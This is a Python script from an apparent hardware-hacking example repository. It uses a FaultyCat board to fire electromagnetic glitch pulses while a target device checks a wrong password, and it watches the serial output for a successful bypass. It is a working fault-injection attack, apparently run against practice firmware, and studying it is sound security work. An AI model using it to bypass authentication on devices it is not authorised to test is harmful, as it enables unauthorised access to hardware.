Newer
Older
Hardware / FaultInjection / examples / FaultyCat / 03_password_check / attack.py
0xRoM on 11 Feb 7 KB initial commit
  1. import sys
  2. import time
  3. import pexpect # Required to handle screen sessions
  4. import threading
  5. from Modules import Worker
  6.  
  7. DEFAULT_COMPORT = "/dev/ttyACM0"
  8. SCREEN_NAME = "ttyUSB0_screen" # Replace this with the actual screen session name
  9.  
  10. # Initialize the FaultyWorker
  11. faulty_worker = Worker.FaultyWorker()
  12. # Shared variable to store the response from the device
  13. device_response = None
  14. child = None # Global child variable
  15.  
  16. def initialize_child():
  17. """Initialize the global child process for the screen session."""
  18. global child
  19. child = pexpect.spawn(f'screen -x {SCREEN_NAME}', encoding='utf-8')
  20. child.expect(pexpect.TIMEOUT, timeout=1) # Clear out any pre-existing buffer
  21.  
  22. def send_test_message_and_read_response():
  23. """Send 'ping' via screen to a serial device and check for 'correct!\\n' or 'incorrect\\n'."""
  24. global child
  25.  
  26. # Send 'ping' to the screen session
  27. child.sendline("ping")
  28. sys.stdout.write("\rSent 'ping' to screen session.")
  29. sys.stdout.flush()
  30.  
  31. # Wait a bit to ensure the command is processed
  32. time.sleep(0.5)
  33.  
  34. # Try reading any new output from the screen session
  35. try:
  36. response = child.read_nonblocking(size=1024, timeout=2) # Read up to 1024 bytes of new data
  37. if "pong" in response:
  38. sys.stdout.write("\rReceived 'pong' response.")
  39. return True
  40. else:
  41. sys.stdout.write(f"\rReceived unexpected response: {response}")
  42. sys.stdout.flush()
  43. except pexpect.exceptions.TIMEOUT:
  44. sys.stdout.write("\rNo response received from the screen session (timeout).")
  45. sys.stdout.flush()
  46.  
  47. return False
  48.  
  49. def read_screen_output():
  50. """Read output from the screen session in a separate thread."""
  51. global device_response
  52. buffer = "" # Initialize a buffer to store incoming characters
  53.  
  54. try:
  55. while True:
  56. response = child.read_nonblocking(size=1024, timeout=2) # Read up to 1024 bytes of new data
  57. buffer += response # Append the new response to the buffer
  58. # Check if there's a complete line in the buffer
  59. while "\n" in buffer:
  60. line, buffer = buffer.split("\n", 1) # Split the buffer at the first newline
  61. line = line.strip() # Remove any leading/trailing whitespace
  62.  
  63. # Check for specific responses
  64. if "incorrect!" in line:
  65. #sys.stdout.write("\rReceived 'incorrect' response.")
  66. device_response = 'incorrect'
  67. return # Exit the loop on incorrect response
  68. elif "correct" in line:
  69. # Die here: Echo message, disarm device, and kill the program
  70. sys.stdout.write("\nReceived 'correct' response.\n PWNT, U R ADMIN\n Disarming the device and exiting...\n")
  71. sys.stdout.flush()
  72.  
  73. # Disarm the board
  74. faulty_worker.board_uart.send(faulty_worker.board_configurator.board_commands.COMMAND_DISARM.value.encode("utf-8"))
  75. faulty_worker.board_uart.close()
  76.  
  77. # Exit the program
  78. sys.exit(0)
  79.  
  80. else:
  81. sys.stdout.write(f"\rReceived unexpected response: {line}")
  82. sys.stdout.flush()
  83.  
  84. except pexpect.exceptions.TIMEOUT:
  85. sys.stdout.write("\rNo response received from the screen session (timeout).")
  86. sys.stdout.flush()
  87. except Exception as e:
  88. sys.stdout.write(f"\rError reading from screen session: {e}")
  89. sys.stdout.flush()
  90.  
  91. def send_pulse_and_check_response():
  92. """Send a pulse and check for 'correct!\\n' or 'incorrect\\n' response in parallel."""
  93. global device_response
  94. try:
  95. # Wait a bit to ensure the command is processed
  96.  
  97. # Send 'incorrectPassword' command to the screen session
  98. sys.stdout.write("\rSending 'incorrectPassword' to screen session.")
  99. sys.stdout.flush()
  100. child.sendline("incorrectPassword")
  101. time.sleep(0.35)
  102.  
  103. # Send 'pulse' command (simulating the pulse trigger)
  104. faulty_worker.board_uart.send(faulty_worker.board_configurator.board_commands.COMMAND_PULSE.value.encode("utf-8"))
  105. sys.stdout.write("\rSent pulse...")
  106. sys.stdout.flush()
  107.  
  108. # Start a thread to read the screen output
  109. reader_thread = threading.Thread(target=read_screen_output)
  110. reader_thread.start()
  111.  
  112. # Wait for the reading thread to complete
  113. reader_thread.join()
  114. except Exception as e:
  115. sys.stdout.write(f"\rError interacting with screen session during pulse: {e}")
  116. sys.stdout.flush()
  117. return False
  118.  
  119. def start_faulty_attack():
  120. """Send a pulse through the FaultyCat and listen for the response concurrently."""
  121. global child
  122. try:
  123. # Initialize the child process for screen session
  124. initialize_child()
  125.  
  126. # Open FaultyCat connection
  127. faulty_worker.board_uart.open()
  128. time.sleep(0.1)
  129. sys.stdout.write("\rBoard connected.\n")
  130. sys.stdout.flush()
  131.  
  132. # Arming the board
  133. sys.stdout.write("\r[*] ARMING BOARD, BE CAREFUL!\n")
  134. sys.stdout.flush()
  135. faulty_worker.board_uart.send(faulty_worker.board_configurator.board_commands.COMMAND_DISARM.value.encode("utf-8"))
  136. time.sleep(1)
  137. faulty_worker.board_uart.send(faulty_worker.board_configurator.board_commands.COMMAND_ARM.value.encode("utf-8"))
  138.  
  139. sys.stdout.write("\r[*] ARMED BOARD.\n")
  140. sys.stdout.flush()
  141. time.sleep(1)
  142.  
  143. # Sending pulses and checking responses in a loop (up to 5 times)
  144. max_iterations = 5
  145. for i in range(max_iterations):
  146. sys.stdout.write(f"\rLoop {i+1}/{max_iterations}: Sending pulse and checking response.\n")
  147. sys.stdout.flush()
  148.  
  149. # Send the test message and check for pong
  150. if send_test_message_and_read_response():
  151.  
  152. max_iterations_2 = 3
  153. for j in range(max_iterations_2):
  154. # Send pulse and check for correct/incorrect response
  155. if send_pulse_and_check_response():
  156. break # Break the loop if 'correct!' is received
  157.  
  158. # Small delay before next iteration
  159. time.sleep(1)
  160.  
  161. # Disarm the board
  162. sys.stdout.write("\rDISARMING BOARD. \n")
  163. sys.stdout.flush()
  164. faulty_worker.board_uart.send(faulty_worker.board_configurator.board_commands.COMMAND_DISARM.value.encode("utf-8"))
  165. faulty_worker.board_uart.close()
  166. sys.stdout.write("\rBOARD DISARMED.\n")
  167. sys.stdout.flush()
  168. except Exception as e:
  169. sys.stdout.write(f"\rError: {e}\n")
  170. sys.stdout.flush()
  171. finally:
  172. # Make sure to clean up the child process
  173. if child:
  174. child.close()
  175.  
  176. def faulty():
  177. """Configure and send pulses through the FaultyCat."""
  178. comport = DEFAULT_COMPORT
  179.  
  180. print("Configuring the FaultyCat...")
  181. print(f"Using serial port: {comport}")
  182.  
  183. # Set the serial port
  184. faulty_worker.set_serial_port(comport)
  185.  
  186. # Validate the serial connection
  187. if not faulty_worker.validate_serial_connection():
  188. print(f"Error: Could not establish connection on: {comport}")
  189. return
  190.  
  191. # Start the faulty attack (send pulse)
  192. start_faulty_attack()
  193.  
  194. if __name__ == "__main__":
  195. print("Starting FaultyCat...")
  196. faulty()
Buy Me A Coffee